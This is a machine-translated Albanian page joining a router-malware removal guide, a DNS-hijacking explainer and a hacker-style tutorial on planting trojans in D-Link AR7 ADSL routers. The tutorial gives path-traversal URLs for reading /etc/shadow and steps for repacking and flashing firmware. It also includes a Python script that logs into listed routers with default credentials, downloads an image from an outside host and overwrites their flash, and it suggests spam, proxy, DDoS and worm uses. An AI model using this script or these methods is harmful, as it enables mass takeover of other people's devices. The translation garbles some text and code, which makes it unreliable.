Mund t'ju duket e çuditshme, por ka viruse që infektojnë jo kompjuterët, as laptopët pajisje celulare, dhe ruterat.
Pse ta bëj? Pastaj, megjithëse ruteri juaj nuk ruan asnjë informacion të vlefshëm, Qasja në këtë pajisje do t'ju lejojë të ndryshoni cilësimet e serverit DNS. Kjo, nga ana tjetër, do t'i lejojë mashtruesit të përcjellin disa nga kërkesat tuaja në faqet e rreme ku do të hyni informacion konfidencial të dobishme për mashtruesit. Shumë modele ruterash janë të ndjeshëm ndaj infeksionit, është e kotë të jepet një listë, pasi mund të përditësohet vazhdimisht. Për sigurinë tuaj, unë rekomandoj me rekomandime që do t'ju lejojnë të shmangni infeksionin.
Si funksionon një virus?
Kompjuteri juaj infektohet me një virus të quajtur Win32.Sector. Kjo, nga ana tjetër, shkarkon Trojan.Rbrute nga një server i veçantë, i cili kërkon në rrjet për ruterat dhe përpiqet të hyjë në konfigurim. Pasi fiton akses, ai ndryshon rrymën Adresat DNS, të regjistruara në ruter, më vete. Më pas, të gjitha pajisjet e lidhura me ruterin shfaqen në faqen nga e cila është shkarkuar Win32.Sector.
- Ikona "Internet" është aktive, por nuk mund të arrish në shumicën e sajteve ose janë ngarkuar faqet e gabuara që ke dashur të hapësh
- Uebfaqe të çuditshme hapen spontanisht
- Kompjuteri nuk mund të marrë një adresë IP nga rrjeti juaj (i është caktuar një adresë si 169.254.xxx.xxx në nënrrjetin Microsoft)
Si të hiqni virusin Trojan.Rbrute nga ruteri?
- Së pari ju duhet të rivendosni ruterin në cilësimet e fabrikës. Për ta bërë këtë, mbani të shtypur butonin "Rivendosje" në pjesën e pasme të ruterit dhe prisni 10 sekonda derisa ruteri të pulsojë të gjithë treguesit dhe të rindizet.
2. Shkoni te paneli i administratorit të ruterit dhe ndryshoni fjalëkalimi i paracaktuar për të hyrë në panelin e administratorit vetë, mundësisht më e vështirë.
3. Ne konfigurojmë përsëri ruterin, kontrollojmë nëse Interneti po funksionon siç duhet.
4. Nga faqja zyrtare e prodhuesit të ruterit, shkarkoni firmware më të fundit për modelin tuaj dhe ndezeni atë. Me shumë mundësi në Versioni i fundit Vrimat e firmuerit përmes të cilave sulmuesit fituan akses në cilësimet e ruterit janë të mbyllura.
5. Pas kësaj, ne kontrollojmë kompjuterin për malware për të përjashtuar mundësinë që WinSector ose Trojan.Rbrute të mbeten në hard diskun e kompjuterit. Mund të bëhet fonde të lira nga artikulli
Shpresoj se artikulli im ju ka ndihmuar =)
Përshëndetje lexuesi im! Në këtë artikull, unë do të flas për ruterat e mrekullueshëm ADSL.
– i domosdoshëm në shtëpi dhe rrjetet industriale copa hekuri. Unë do t'ju tregoj për pyetjen
shfrytëzimi i këtyre copave të hekurit për qëllime të dobishme për ne - qepje në mënyrë brutale
Trojan brenda ruterit. Dhe në atë mënyrë që askush të mos e vërë re
administrator i zgjuar, pa përdorues me veshë të mëdhenj.
Dëshirat ose kërkesat për IQ
Kur shkrova këtë artikull, supozova se do të mjaftonte ta lexoja
një përdorues i avancuar me GNU\Linux të instaluar i cili gjithashtu ka disa aftësi
punë dhe programim në këtë sistemi operativ. Megjithatë, duket
është e mundur të përsëris hapat e mi në Windows (duke përdorur Cygwin, për shembull), por
nuk do të përshkruhet. Për kënaqësi maksimale, ju duhet gjithashtu
aftësi për saldim (kjo është fakultative).
Dhe gjithçka filloi ...
Diçka që unë devijoj. Pra, gjithçka filloi me atë se si një ditë kaq shumë
copë hekuri, ose më mirë, ndërpreu pabesisht lidhjen me internetin dhe nuk e bëri
donte ta rivendoste. Në të njëjtën kohë, ajo ishte larg, akses fizik
ajo nuk ishte atje (megjithatë, unë gënjeva për diçka - isha shumë dembel të ngrihesha nga divani
rinisni ruterin :)), ndërfaqja në internet nuk u përgjigj, por e mbaja mend atë
kjo gjë duhet të jetë telnet ose ssh. Hyni në zonën e administrimit
Unë nuk kam provuar më parë dhe në mënyrë të pamatur nuk e kam ndryshuar fjalëkalimin në tim llogari(si
doli më vonë, kot, sepse si parazgjedhje është "admin: admin"). Kështu unë
provoi SSH dhe funksionoi!
$ ssh [email i mbrojtur]
$Fjalëkalimi:
Si një rrufe në qiell! Busybox! Asnjëherë nuk mendova se nën të kujt
Ky ruter është në kontroll, rezulton - GNU / Linux! u tremba
Pyes veten se si funksionon gjithçka këtu dhe, mendërisht falë dembelizmit dhe rastësisë, unë
filloi kërkimin.
Mbledhja e informacionit
Pra, ku fillova? Sigurisht nga lista komandat e disponueshme:
#kuti e zënë
...
Funksionet e përcaktuara aktualisht:
[, ash, busybox, mace, chgrp, chmod, chown, cp, data, dd, df, echo, false, free,
grep, emri i hostit, id, ifconfig, init, insmod, kill, ln, login, ls, lsmod, mkdir,
modprobe, montim, mv, passwd, ping, ps, pwd, rindezje, rm, rmmod, rrugë, sh, gjumë,
sinkronizimi, tar, test, tftp, prekje, e vërtetë, tty, shuma, wget, whoami, po
Kompleti është mjaft i arsyeshëm, i mjaftueshëm për kërkime normale dhe zbatim të ideve.
Tjetra, interesimi u ngrit në versionin e kernelit:
# cat /proc/version
Versioni Linux 2.4.17_mvl21-malta-mips_fp_le ( [email i mbrojtur]) (versioni gcc 2.95.3
20010315 (lëshim/MontaVista)) #1 e enjte 28 dhjetor 05:45:00 CST 2006
Për referencë: MontaVista është një shpërndarje e fokusuar në embedded
sistemeve. Shumica dërrmuese e prodhuesve pajisjet e rrjetit dhuroj
preferenca për këtë sistem. Mund të gjendet gjithashtu në pajisje të tjera, për shembull, në
libra elektronikë ose telefona celularë.
# cat /etc/versione
KLIENTI=DLinkRU
MODEL=DSL-500T
VERSION=V3.02B01T01.RU.20061228
HTML_LANG=EN.302
BOARD=AR7VW
VERSION_ID=
CPUARCH_NAME=AR7
MODEL_ID=
FSSTAMP=20061228055253
# cat /proc/cpuinfo
procesor
: 0
modeli i procesorit
: MIPS 4KEc V4.8
BogoMIPS
: 149.91
prit udhëzim: jo
kohëmatës mikrosekondë: po
vektori i ndërprerjes shtesë: po
pikë vëzhgimi harduerësh: po
Përjashtimet e VCED: nuk disponohet
Përjashtimet e VCEI: nuk disponohet
AR7 është një çip me dy bërthama i zhvilluar nga Texas Instruments. Ai
përmban një ruter të plotë ADSL në një çip të vetëm që mbështet standardet ADSL1,
ADSL2,ADSL2+. Bazuar në procesorin MIPS 4KEc RISC me performancë të lartë, me
Frekuenca e orës 175 ose 233 (në varësi të teknologjisë së prodhimit: 18 µm
ose 13 µm). Çipi përmban 2 ndërfaqe UART në bord, njëra prej të cilave (UART_A)
përdoret për të nxjerrë informacionin e korrigjimit, si dhe një ndërfaqe EJTAG që shërben
për korrigjimin e gabimeve (firmware) memorie flash. Rreth përdorimit të këtyre ndërfaqeve do të jetë
përshkruar më poshtë.
Më në fund, pashë informacionin e kujtesës:
# cat /proc/mounts
/dev/mtdblock/0 / squashfs ro 0 0
asnjë /dev devfs rw 0 0
proc /proc proc rw 0 0
ramfs /var ramfs rw 0 0
# cat /proc/mtd
dev: madhësia fshihet emri
mtd0:0034f000 00010000 "mtd0"
mtd1:00090f70 00010000 "mtd1"
mtd2: 00010000 00002000 "mtd2"
mtd3: 00010000 00010000 "mtd3"
mtd4: 003e0000 00010000 "mtd4"
Natyrisht, duke mos harruar adresat e bllokut:
# cat /proc/ticfg/env | grep mtd
mtd0 0x900a1000,0x903f0000
mtd1 0x90010090,0x900a1000
mtd2 0x90000000.0x90010000
mtd3 0x903f0000,0x90400000
mtd4 0x90010000,0x903f0000
Nga sa më sipër, doli që memoria Flash (/dev/mtdblock) ka 5 blloqe:
mtd0- imazh sistemi i skedarëve SquashFs. Ky është një skedar i veçantë
një sistem që është i ngjeshur dhe vetëm për lexim. Për
kompresimi përdor algoritmin gzip, por këtë rast– LZMA (raporti i kompresimit
më i lartë). Madhësia e këtij blloku është 4 MB.
mtd1– ky bllok përmban bërthamën MontaVista të ngjeshur nga algoritmi LZMA
gjendja, madhësia e bllokut 600 Kb.
mtd2– Bootloader ADAM2, kryen nisjen e kernelit, gjithashtu ka
shërbimi i serverit FTP për rikuperim dhe ndezje. Më shumë për të do të jetë
tha më tej. Madhësia e bllokut është 64 KB.
mtd3– ndahet midis të dhënave të konfigurimit dhe mjedisit
blloku (ndryshoret e mjedisit), i cili mund të shihet në /proc/ticfg/env.
Të dhënat e konfigurimit janë në /etc/config.xml. Një ndërmjetës midis skedarit
blloku i konfigurimit të sistemit është i mbyllur (si të gjitha cm_* që kontrollojnë, o
ato më vonë) programi cm_logic. Madhësia e këtij blloku është gjithashtu 64 KB.
mtd4- kjo përmban nënshkrimin e firmuerit, kernelin dhe imazhin e skedarit
sistemeve. Ky bllok përdoret kur përditësohet firmueri nëpërmjet ndërfaqes në ueb.
Fillimisht, ai ruhet në këtë bllok, më pas kontrollohet shuma e kontrollit
dhe, nëse konvergon, shkruhet në vendndodhjen e tij të re.
RAM (16 MB në këtë model, por ADAM2 në këtë model
sheh vetëm 14 MB, trajtohet nga një përditësim), montohet në drejtorinë /var dhe
mund të përdoret në mënyrë të sigurt për qëllimet tona:
# falas
gjithsej buferët e përbashkët falas të përdorur
Mem: 14276 10452 3824 0
Të mos harrojmë të kalojmë në listën e proceseve. Nga interesantet që fshihen këtu
demonët: thttpd - Web server; dproxy - caching Pyetjet DNS proxy server; ddnsd
- Daemon DNS; pppd ... - në fakt një demon që zbaton një lidhje mbi protokollin
PPP, dhe në parametrat shohim informacionin e llogarisë. Pra, nëse ruteri nuk është
pretendon të jetë një çorape (lexo - jo në modalitetin e urës), atëherë mundesh
lehtë për të marrë një llogari.
Programet cm_* janë të pronarit dhe tashmë janë përfshirë në kodet burimore.
përpiluar (këto programe janë zhvilluar gjithashtu nga Texas Instruments, në D-Link
nuk ka nevojë të betohet për mosrespektim të licencave).
cm_logjika- një program që kontrollon logjikën e sistemit, nëpërmjet tij
kalon konfigurimin; sinkronizon /etc/config.xml me
pjesa përkatëse e përmbajtjes së /dev/ticfg (duke treguar mtd3).
cm_cli– ndërfaqja linja e komandës për menaxhimin dhe konfigurimin
sistemeve. Për shembull, cilësimet e lidhjes bëhen përmes kësaj ndërfaqe.
cm_pc– nis dhe monitoron proceset, lidhjet me rregullat
(për shembull, ekzekutoni programin si një demon, rregullat gjithashtu përfshijnë informacione rreth
portet për t'u hapur) siç përshkruhet në /etc/progdefs.xml; ngarkohet menjëherë pas
bërthamat.
webcm– Ndërfaqja CGI është plot me vrima, për shembull ju lejon të shikoni /etc/shadow,
thjesht duke hyrë në URL.
http://192.168.1.1/../../../etc/shadow
Nuk kam asgjë, thttpd nuk është aq e thjeshtë, por nëse po:
http://192.168.1.1/cgi-bin/webcm?getpage=/etc/shadow
Një tjetër gjë. Kjo mund të përdoret për të mbledhur informacion nëse nuk ka qasje
ssh/telnet, por ka akses në ndërfaqen e uebit.
firmwarecfg- përdoret për ndezje përmes ndërfaqes në ueb. Në hyrje
të këtij programi, një imazh transmetohet nga një kërkesë POST nga ndërfaqja e Uebit dhe tashmë është
ridrejtohet në memorien Flash pas kontrollit shuma e kontrollit imazh.
Kjo përfundon mbledhjen e informacionit parësor, është koha për të kaluar në vendimtare
veprimet.
Instalimi i mjeteve të zhvillimit dhe përpilimi i firmuerit
firmware Ruterat D-Link(dhe të gjithë të tjerët bazuar në GNU/Linux)
të shpërndara nën licencën GPL, mund t'i merrni në zyrtar
Server FTP. Në fakt, ju mund të zgjidhni cilindo nga lista e firmware-it të sugjeruar,
ato janë të njëjta (për sa i përket serisë T). Në dorëzim - kodi burim i kernelit, mjedisit,
mjetet e nevojshme dhe zinxhirin e veglave për zhvillimin/përpilimin ekzistues
programet. Duhet të zbërthehet në rrënjë dhe të shtohet në ndryshoren e mjedisit
Rruga PATH drejt direktorisë së koshit të zinxhirit të mjeteve:
$ tar xvf tools.tgz
$ eksportoni PATH=$PATH:/opt/
Tani për të përpiluar tuajin firmware-in e vet, shkoni te drejtoria
me kodet burimore dhe ekzekutoni të njëjtën markë.
$ cd DSL/TYLinuxV3/src && make
Shumë pyetje do të bëhen në lidhje me aktivizimin e mbështetjes së pajisjes (më mirë
përgjigjuni atyre në mënyrë pozitive). Në fund të përpilimit në drejtorinë TYLinuxV3/images
imazhet e firmuerit do të krijohen. Ju gjithashtu mund të ekzekutoni një skript me të njëjtin emër si juaji.
model nga drejtoria /TYLinuxV3/src/scripts.
Disa fjalë për transferimin e skedarëve midis një ruteri dhe një kompjuteri. E para
metoda që kam përdorur është aftësia për të transferuar skedarë duke përdorur protokollin SSH,
duke përdorur programin scp për këtë. Por pak më vonë kuptova se mc (Midnight
Commander) ka gjithashtu mundësinë për t'u lidhur nëpërmjet SSH (Panel -> Shell Connection).
Përndryshe, mund të konfiguroni një server Web ose FTP në vendin tuaj të punës. Më vonë unë
i dha përparësi Web-serverit, sepse ai funksionon më shpejt. instalova
thttpd, i vogël dhe i shpejtë, ashtu si në një ruter. Nisim në shtëpi dhe vazhdojmë
skedari i ruterit, pasi të keni shkuar në drejtorinë /var (ai, siç u përmend
i disponueshëm më parë për regjistrim).
$ thttpd -g -d ~/ForRouter -u përdorues -p 8080
# cd /var
# wget http://192.168.1.2/file
Për të shkarkuar një skedar nga ruteri, mund të ngrini gjithashtu serverin në internet:
# thttpd -g -d /var -u rrënja -p 8080
Kushtojini vëmendje, nëse dëshironi të shkarkoni një skedar të ekzekutueshëm nga ruteri, duhet
hiqni të drejtat e nisjes. Gjatë shkarkimit një numër i madh skedarë nga ruteri
është më mirë të përdorni mc, nuk do të keni nevojë të kopjoni skedarët në / var fillimisht dhe
hiqni të drejtat dhe më pas fshijini këta skedarë për të liruar hapësirë. Në përgjithësi, çështja
shijoni, zgjidhni çdo opsion që është i përshtatshëm për ju.
Krijimi i programit tuaj
Le të fillojmë, natyrisht, me klasikët e programimit - HelloWorld. Disa të veçanta
nuk ka rregulla. Teksti i programit është i njohur me dhimbje:
#përfshi
#përfshi
int kryesore (i zbrazët)
{
printf("Mate.Feed.Kill.Repeat.");
kthimi 0;
}
Përpilimi (rruga drejt zinxhirit të veglave duhet të specifikohet në variablin e mjedisit
RRUGË):
$ mips_fp_le-gcc ferr.c -o ferr
$ mips_fp_le-strip -s ferr
# cd /var
# chmod +x ferr
# ./ferr
Dhe... asgjë nuk do të ndodhë, ose alarmi i rrugës do të bjerë jashtë nuk u gjet. Cfare eshte
rast? Unë kam folur tashmë për cm_pc më herët - ky program lëshon të tjerët në
sipas rregullave të përshkruara në /etc/progdefs.xml. Këtu vjen koha
modifikoni dhe ndezni imazhet e sistemit të skedarëve.
Modifikimi i sistemit të skedarëve
Për të modifikuar sistemin e skedarëve, së pari duhet
shpaketoj. Siç e përmenda, sistemi i skedarëve këtu është SquashFs me një patch LZMA.
Paketa e zhvillimit të firmuerit përfshin vetëm programin mksquashfs (për krijimin
imazhi), unsquashfs (për shpaketim) mungon. Por nuk ka rëndësi, gjithçka është në dispozicion
në faqen e internetit të sistemit të skedarëve, ne kemi nevojë për versionin e parë. Duke aplikuar patch-in LZMA dhe
pasi kemi mbledhur shërbimet, i vendosim mënjanë në një vend të përshtatshëm. Së pari, le të marrim një imazh
sistemi i skedarëve nga ruteri:
# cat /dev/mtdblock/0 > /var/fs.img
$ mkdir unpacked_fs
$unsquashfs fs.img unpacked_fs
Tani ju mund të modifikoni si të doni, por ne duam të hedhim FuckTheWorld në
drejtoria /bin dhe shtoni një rregull për të ekzekutuar në /etc/progdefs.xml.
$ cp përshëndetje unpacked_fs/bin
$ vim unpacked_fs/etc/progdefs.xml
Dhe shtoni këtë (midis etiketave
Ruani dhe paketoni përsëri:
$ mksquashfs unpacked_fs my_fs.img -noappend
Vini re se imazhi i sistemit të skedarëve nuk duhet të kalojë
madhësive të lejuara. Nëse ju pëlqen të provoni diçka urgjentisht, dhe nuk e bën
përshtatet, hiqni nga imazhi diçka "të panevojshme" si grep, whoami ose
përdorni paketuesin skedarë të ekzekutueshëm UPX. Tani ngarkoni në ruter
imazhin dhe kaloni në seksionin tjetër.
Kapja e një imazhi të sistemit të skedarëve
Mënyra për të ndezur ruterin është shumë e thjeshtë, konsiston në aksesin në pajisje
/dev/mtdblock/*. Pra, ngarkoni në ruter me ndonjë mënyrë e përshtatshme imazhin e skedarit
sistem dhe kryeni këtë veprim të thjeshtë:
# cat my_fs.img > /dev/mtdblock/0 && rindez
# cp my_fs.img /dev/mtdblock/0 && rindez
Pas një kohe, kur procesi i regjistrimit të përfundojë, ruteri do të rindizet dhe
ndryshimet do të hyjnë në fuqi. Le të përpiqemi të japim shembullin tonë:
#ferr
Mate.Feed.Kill.Përsërite.
Mënyrat për të rikuperuar në rast dështimi
Para se të ndezni ruterin me "mjeshtëri" më serioze, duhet të mësoni se si
veproni në raste kritike kur ruteri refuzon
ngarkesës. Nuk ka situata të pashpresa. Serveri ADAM2 FTP vjen në shpëtim. Për
fillimisht ju duhet të ekzekutoni klientin FTP në adresën IP ADAM2, e cila mund të shikohet
në /proc/ticfg/env (parametri my_ipaddress).
$ ftp 192.168.1.199 $
220 ADAM2 Server FTP gati.
530 Ju lutemi identifikohuni me USER dhe PASS.
Për qartësi, mund të aktivizoni modalitetin e korrigjimit, pastaj të gjitha
informacion dhe të gjitha përgjigjet FTP:
Hyrja / fjalëkalimi - adam2 / adam2. Procesi i ndezjes është shumë i thjeshtë. Të fillosh
ndryshoni seancën FTP në modalitetin binar:
ftp> citoj MEDIA FLSH
Tani dërgojmë, për shembull, një imazh të sistemit të skedarëve dhe specifikojmë vendndodhjen
destinacioni:
ftp> vendos fs.img "fs.img mtd0"
Ne presim fundin e regjistrimit, rindizni ruterin, dilni nga seanca:
ftp> kuotë REBOOT
ftp>dal
Të gjitha! Siç mund ta shihni, nuk ka asgjë të vështirë, tani nëse diçka nuk shkon, ju
ju gjithmonë mund t'i rregulloni gjërat.
Për lehtësi, duhet të jepni një adresë IP normale, aktivizoni
ngarkimi automatik (për të mos kërcyer me rivendosje) dhe rrit pak kohën
duke pritur për një lidhje përpara se të ngarkoni kernelin. Të gjitha këto cilësime ruhen në
variablat e mjedisit, ka të veçanta Komandat FTP ADAM2: GETENV dhe SETENV (për
marrja dhe vendosja e një ndryshoreje, përkatësisht). AT seancat FTP shkruani sa vijon
komandat:
ftp> SETENV autoload,1
ftp> SETENV autoload_timeout,8
ftp> SETENV my_ipaddress,192.168.1.1
ftp> kuotë REBOOT
ftp>dal
Ruteri riniset dhe mund të shkoni te ADAM2 në 192.168.1.1:21. Nese nje
do të ketë një dëshirë për të rifreskuar imazhin e kernelit, dhe kerneli do të refuzojë të niset, FTP
do të fillojë vetë. Para se të ndizni me imazhe të modifikuara, sigurohuni
ruajini ato aktuale për rikuperim. Në përgjithësi, ju mund të ndryshoni variablat e mjedisit
dhe nëpërmjet /proc/ticfg/env, thjesht doja të flisja më shumë rreth punës me FTP.
# echo my_ipaddress 192.168.1.1 > proc/ticfg/env
Dhe ju mund t'i kontrolloni ndryshimet si kjo:
# cat /proc/ticfg/env | grep my_ipaddress
Çfarë duhet të bëni nëse dëshironi të provoni të ndezni ngarkuesin dhe si
të veprojë në rast dështimi? Ose ruteri për ndonjë arsye nuk fillon, dhe
nuk ka qasje në ADAM2? Ekziston një rrugëdalje - JTAG, ose më saktë, EJTAG është i pranishëm në këtë çip
(versioni i zgjeruar). Kjo është një ndërfaqe për korrigjimin/programimin në qark.
Për t'u lidhur me këtë ndërfaqe, na duhet porta LPT e kompjuterit,
lidhëse dhe 4 rezistenca. Skema është e thjeshtë.
Unë nxitoj të vërej se firmware përmes JTAG nuk është një biznes i shpejtë, do të marrë mjaftueshëm
shumë kohë. Pra, duhet të përdoret vetëm për të rivendosur ngarkuesin,
edhe nëse nuk funksionon. Për të komunikuar nëpërmjet JTAG, duhet të përdorni një speciale
program të tillë si UrJTAG. Më poshtë është një shembull se si funksionon kjo ndërfaqe.
Konfigurimi i komunikimit:
jtag> kabllo paralel 0x378 DLC5
jtag> zbuloj
Zbulimi i memories flash:
jtag> detectflash 0x30000000 1
Leximi i memorjes flash:
jtag> readmem 0x30000000 0x400000 fullflash.img
Shkrimi në memorie (bootloader):
jtag> flashmem 0x30000000 adam2.img
Është gjithashtu e dobishme të dini për ndërfaqen UART (unë premtova të flas për të më herët). AT
UART_A raporton, domethënë, bootloader regjistrohet (në një fazë të hershme të nisjes nga
ju mund të flisni me të) dhe thelbi. Kur shkruani kernel të modifikuar, kjo
i domosdoshëm për korrigjimin e gabimeve. UART - Marrës/Transmetues Universal Asinkron
(transmetuesi asinkron universal) është pothuajse gjithmonë i pranishëm në
mikrokontrolluesit.
Qarku i përshtatësit është shumë i thjeshtë. Bazuar në vetëm një çip -
Konvertuesi i nivelit TTL: MAX232 për COM dhe FT232R për USB. Mikroqarqet
janë mjaft të zakonshme dhe nuk do të ketë probleme me blerjen.
Skema do të dërrasë buke(i cili mund të vendoset në mënyrë të sigurt në kasë
Lidhësi i portit COM) në 20 minuta dhe sjell shumë përfitime. Për shembull, kur korrigjoni
Bërthamat janë një zgjidhje absolutisht e domosdoshme. Dhe nëse elektronika është e ngushtë? Dilni
jane korda USB per telefona te vjeter, vetem kane nje konvertues
UART - USB.
Disa ide për shpërndarje
Proxy/çorapet tuaja në ruterin e dikujt tjetër janë të shkëlqyera. Si, në fakt, spamming
mbi të gjitha protokollet ruter. Ky nuk është një kompjuter Windows për ju.
riorganizoni çdo muaj :). Routerët shpesh nuk ndryshojnë ose rifreskohen. po dhe
kush, përveç nesh, do të vinte me vetë idenë për të infektuar një ruter?
Mos harroni, ne kontrollojmë të gjithë trafikun nga përdoruesi/rrjeti. Për më shumë
ruterë të fuqishëm dhe tashmë është e mundur të varni një bot DDOS. Fshih skedarin/fsheh procesin,
ndërpres shkrimin në blloqe mtd, duke eliminuar fshirjen e programit tonë - gjithçka që
cfaredo!
Le të themi se do të filloni të shkruani një program serioz për një ruter.
Korrigjimi shumë i mirë është i rëndësishëm, ndoshta do t'ju duhet ta bëni shumë herë
rishkruaj/rivendos imazhet... Kjo është një perspektivë shumë e trishtuar. Edhe duart
pak më e ulët, nëse marrim parasysh edhe se burimi i rishkrimit të memories Flash
i vogël (më shumë detaje në dokumentacionin për çipin e memories), dhe ka një perspektivë
largoje atë. Por ka një rrugëdalje! Qemu mund të imitojë AR7! Mund ta imagjinoni se çfarë
a ofron mundësi dhe komoditet të pakufishëm? Tani nuk ka asgjë për të na penguar
shkruani diçka tepër interesante!
Kështu që. Ke shkruar një program, e ke kontrolluar vetë ose 1-2 ruterë të njerëzve të tjerë, por
i gjithë rrjeti është akoma përpara, infektimi manual është një punë e përditshme, në ruterin e 10-të ju tashmë po filloni
mallko gjithë botën, dhe noton në sy nga vargjet e "maces" dhe "mtd". Le të shkruajmë
softuer për automatizimin e këtyre aktivitete rutinë. Unë zgjodha gjuhën python.
Plani i punës është:
- përpilimi i një liste ruterash, për shembull, duke përdorur nmap;
- skripti duhet të marrë adresat IP nga lista në rend, futni përmes
telnet me hyrje/fjalëkalim standard; - pastaj të njëjtat veprime: ngarkoni imazhin e modifikuar,
mbishkruaj, rindez.
#!/usr/bin/env python
#Encode=UTF-8
import telnetlib, kohë
SERVER="http://anyhost.com/fs.image"
për addr në open ("iplist.txt"):
telnet = telnetlib.Telnet(addr)
telnet.set_debuglevel(1)
telnet.read_until ("login:")
koha.gjumë (5)
telnet.write ("admin\n")
telnet.read_until("Fjalëkalimi:")
telnet.write ("admin\n")
telnet.read_until("#")
telnet.write("cd /var && wget " + SERVER)
telnet.read_until("#")
telnet.write ("cat fs.image > /dev/mtdblock/0")
telnet.read_until("#")
telnet.write ("rindez")
telnet.close()
Logjika e skenarit është shumë larg idealit, tani do të shpjegoj pse. Për
së pari duhet të kontrolloni versionin e firmuerit / kernelit dhe modelin e ruterit, sepse mund të ketë
dallime të mëdha në performancë. Më tej, në vend të boshllëqeve të firmuerit, duhet të shkarkoni
imazhin e sistemit të skedarëve nga ruteri, shpaketoni, modifikoni dhe dërgoni
mbrapa. Kjo do të eliminojë problemet e përputhshmërisë me të ndryshme
modelet / versionet e firmuerit, sepse stabiliteti i punës është gjëja më e rëndësishme për ju.
Gjithashtu, një virus mund të ketë funksionet e një krimbi, dhe nëse dëshironi, mundeni gjithmonë
bashkëngjitni një skaner rrjeti në të, forcë brutale për RDP dhe çipa të ngjashëm.
Ekziston një metodë tjetër e shkëlqyer e shpërndarjes. Asgjë nuk ju ndalon të shkruani
program për Windows, të cilin do ta keni me vete (ose ta shkarkoni nga ju
server) imazhin e sistemit të skedarëve dhe infektoni ruterin me të, nëse është i pranishëm.
Shpërndajeni këtë program në të gjitha mënyrat "standarde": disqe të lëvizshëm,
shfrytëzime për programe, infektim i programeve të tjera... Kombinimi i këtyre metodave,
mund të jetë një pandemi e madhe. Vetëm imagjinoni këtë foto
pajisje të ngjashme të shpërndara kudo.
Mbrojtja e ruterit
Pasi gërmova gjithë këtë, mendova: si mund ta mbroj ruterin? Dhe pastaj, ju shikoni,
Unë do të marr veten. Hapi i parë është të ndryshoni fjalëkalimin e përdoruesit në një më kompleks dhe
e gjatë (kufiri - 8 karaktere), ndryshoni banderola dhe përshëndetjet e shërbimit
(me një redaktues hex, ose, mundësisht, rikompiloni programe) në mënyrë që të
nmap ose skanerë të tjerë nuk mund të përcaktonin versionet e shërbimeve.
Ju gjithashtu duhet të ndryshoni portat në të cilat varen demonët. Kjo bëhet përmes
modifikime në progdefs.xml. Vrasni telnet (mënyra më e lehtë për të marrë një fjalëkalim për të, po
dhe protokolli është i pasigurt, pse na duhet), ndizni murin e zjarrit, lejoni lidhjen
për shërbimet vetëm nga adresa e tij IP ose MAC. Përdorni gjithashtu një mur zjarri
për të mbrojtur një rrjet ose një kompjuter, jo më kot është i pranishëm. Vendosje kompetente
Rregullat gjithmonë do të ndihmojnë për t'u mbrojtur.
konkluzioni
Shumë, jo vetëm ruterë D-Link dhe pajisje të tjera të ngjashme janë ndërtuar mbi të
Çipi AR7, lista përfshin Acorp, NetGear, Linksys, Actionec… E bukur
ky AR7 është i popullarizuar së bashku me MontaVista. Nga kjo rrjedh se, duke përdorur të njëjtën
zinxhir mjetesh, pa probleme të veçanta mund të ndiqni hapat e përshkruar në artikull.
Konsideroni: përveç kësaj aktivitete keqdashëse ju mund të bëni diçka të dobishme/të këndshme për veten tuaj
dhe të tjera (nuk debatoj, kënaqësia e hakerimit nuk mund të zëvendësohet, por gjithsesi).
Ju mund të bëni firmware-in tuaj, për shembull, më shumë ruterë të fuqishëm të aftë
shkarkoni / shpërndani torrentët ... Të gjitha modelet kanë një ndërfaqe USB 1.1, por në ato më të rejat
Modelet nuk janë të salduara. Shtoni një modul USB dhe një drejtues të sistemit të skedarëve në kernel,
pajisni ruterin me memorie Flash - dhe në fund ju merrni një lloj ruajtja e rrjetit mbrapa
pak para. Ka shumë opsione, dhe idetë duhet të lindin në mijëra - jo
kufizoni veten, krijoni dhe krijoni!
Më parë, ne kemi shkruar për mashtrimin DNS, si rezultat i të cilit reklamat dhe banderolat e ransomware u shfaqën në kompjuter. Në disa raste, serverët DNS u ndryshuan jo vetëm në Windows, por edhe në ruter. Duke folur teknikisht saktë, mashtrimi DNS, natyrisht, nuk është një virus në kuptimin klasik të fjalës, por një mjedis me qëllim të keq, i cili megjithatë sjell shumë bezdi.
Cili është qëllimi i mashtrimit të serverëve DNS dhe çfarë dëmi shkakton
Serveri DNS është përgjegjës për hartëzimin e emrave të domeneve në adresat IP. Serverët mashtrues DNS janë në gjendje të përputhen me emrin e çdo faqeje të mirë me një tjetër - adresën e gabuar dhe të ngarkojnë përmbajtje të falsifikuar në vend të asaj origjinale. Nëse regjistroni një DNS të tillë "të gabuar" në ruter, atëherë të gjitha pajisjet e lidhura me të do të jenë në rrezik.
Duket kështu. Gjatë shfletimit të sajteve, papritur hapet një faqe me një sugjerim për të përditësuar flash player-in, java, instalimin antivirus falas, shkarkoni një program që supozohet se përshpejton dhe optimizon kompjuterin tuaj ose ndonjë gjë tjetër në dukje të padëmshme. Është e rëndësishme që në këtë rast emri i një faqeje të njohur dhe të verifikuar të mund të shfaqet në shiritin e adresave. Nëse përdoruesi shkarkon dhe ekzekuton skedarin e propozuar, atëherë ka shumë të ngjarë që në të ardhmen e afërt ai të fillojë probleme të mëdha nga PC:
- Reklamat mund të fillojnë të shfaqen në kompjuterin tuaj.
- Skedarët mund të jenë të koduar.
- Kur përpiqeni të hapni ndonjë sajt, mund të shfaqet një kërkesë.
- Desktop mund të kyçet nga një winlocker, përsëri me kërkesën për të transferuar para për zhbllokimin.
- Një kompjuter mund të përdoret për të kryer sulme në internet në faqet e internetit dhe serverët, për të hakuar kompjuterë të tjerë (botnet) dhe vepra të tjera të këqija.
Në këtë rast, si rregull, performanca e PC zvogëlohet, ka thirrje të vazhdueshme hard disk, përdorimi i CPU-së arrin 100% në gjendje boshe.
Si infektohet një ruter?
Si rregull, një nga kompjuterët në rrjet lokal. Virusi hyn në kompjuter kur shkarkon një skedar nga Interneti. Më pas, ai dërgon kërkesa në adresat standarde për pajisjet e rrjetit, mund të skanojë biskota, shkarkoni malware ndihmës (trojan) dhe si rezultat futet në cilësimet e ruterit ose modemit ADSL.
Viruset dhe trojanët mund të ndryshojnë cilësimet e ruterit (në veçanti, të ndryshojnë DNS) nëse:
1. Për të hyrë në ndërfaqen e internetit, përdorni detaje standarde- IP, hyrje dhe fjalëkalim (për shembull, 192.168.1.1, admin/admin)
2. Adresa, login dhe fjalëkalimi i ruterit ruhen në shfletues.
Shenjat e një infeksioni të ruterit
(mund të ndodhin të gjitha së bashku ose veçmas)
1. Në pajisjet që janë të lidhura me ruterin, reklamat shfaqen, skedat e majta / dritaret kërcyese hapen vetë në shfletues, një baner ransomware mund të shfaqet në ekranin e plotë.
